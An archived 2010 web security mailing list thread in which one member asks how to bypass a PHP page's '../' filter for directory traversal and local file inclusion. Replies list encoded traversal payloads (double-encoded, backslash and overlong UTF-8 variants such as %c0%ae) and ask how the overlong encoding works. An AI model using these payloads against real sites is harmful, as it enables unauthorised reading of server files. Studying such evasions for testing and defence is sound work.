[WEB SECURITY] ../ filtered

NeZa neza0x at gmail.com
Mon Feb 22 15:51:40 EST 2010


Hey Shlomi, excelent tips, but wondering if you have written about how to
convert from hex to utf-8, in order to create my own tests.
I mean, as you know, %2e can be utf-8converted to:

C0 AE (11000000 10101110)

E0 80 AE (11100000 10000000 10101110)

F0 80 80 AE (11110000 10000000 10000000 10101110)

F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)

FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)

But i do not understand how it was converted from %2e to %C0 %AE and others.

Any documentation?

On Mon, Feb 22, 2010 at 3:51 AM, Shlomi Narkolayev <shlominar at gmail.com>wrote:

> If ".." is rejected, so try these:
>  %c0%ae%c0%ae\FILENAME
> %uff0e%uff0e/FILENAME
> %c0%ae%c0%ae/FILENAME
> %2e%2e%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> %2e%2e%2fFILENAME
>
> If you still need more combinations, check my blog<http://narkolayev-shlomi.blogspot.com/>in a few days for the full list.
>
>
> Kind Regards,
> Narkolayev Shlomi.
>
>
>
>
> *From:* Beatriz Duran [mailto:beatrizdrn at yahoo.com]
> *Sent:* Tuesday, February 16, 2010 4:40 PM
>
> *To:* Shlomi Narkolayev; websecurity at webappsec.org
> *Subject:* Re: [WEB SECURITY] ../ filtered
>
>
>
> Shlomi,
>
> I tried those already; but they and the ones with ".." are rejected, the
> variable is verifying the string before running it and with the combination:
>
>
> %252e%252e/FILENAME happens this:
>
> viewfiles.php?folder=%252e%252e/
>
> The 25s are removed, the so the %2e%2e are left but transformed in pure
> text so the page reports that the directory %2e%2e doesn't exist; but if I
> apply purely  viewfiles.php?folder=%2e%2e/ the page reject them and say ..
> are not allowed.
>
>
>
>
>
>
> I Have Learned So much from God That I can no longer Call Myself A
> Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much
> of Itself With me That I can no longer call myself A man, a woman, and angel
> Or even pure Soul. Love has Befriended Hafiz so completely It has turned to
> ash And freed Me Of every concept and image My mind has ever known. –Hafiz,
> Persian poet (1315 – 1390)
>
>
>
>
>  ------------------------------
>
> *From:* Shlomi Narkolayev <shlominar at gmail.com>
> *To:* beatrizdrn at yahoo.com; websecurity at webappsec.org
> *Sent:* Tue, February 16, 2010 12:41:16 AM
> *Subject:* RE: [WEB SECURITY] ../ filtered
>
> Try these:
> ..%5c..%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> ..%c0%af..%c0%afFILENAME
> ..%255c..%255cFILENAME
> %252e%252e/FILENAME
> ..%2f..%2fFILENAME
> ..%252f..%252fFILENAME
>
>
> Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> new
> 1400 variants for directory traversal.
>
> Kind Regards,
> Narkolayev Shlomi.
>
>
>
> *From:** Beatriz Duran [mailto:beatrizdrn at yahoo.com]
> Sent: Monday, February 15, 2010 9:43 AM
> To: websecurity at webappsec.org
> Subject: [WEB SECURITY] ../ filtered*
>
>
>
> Hi, I need to find a vulnerability in a url that could be exploited for
> directory traversal and LFI; the page is working with PHP but it is
> filtering /../ and also /%2e%2e/, because the pace is  using ISO for Latin
> characters I can't use unicode extended because it reinterpret with other
> values; is there another way to work around the filter?
>
>
>
>
>
>
>


-- 
NeZa
Hacker Wanna Be from Nezahualcoyotl
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100222/3a25a4c0/attachment.html>


More information about the websecurity mailing list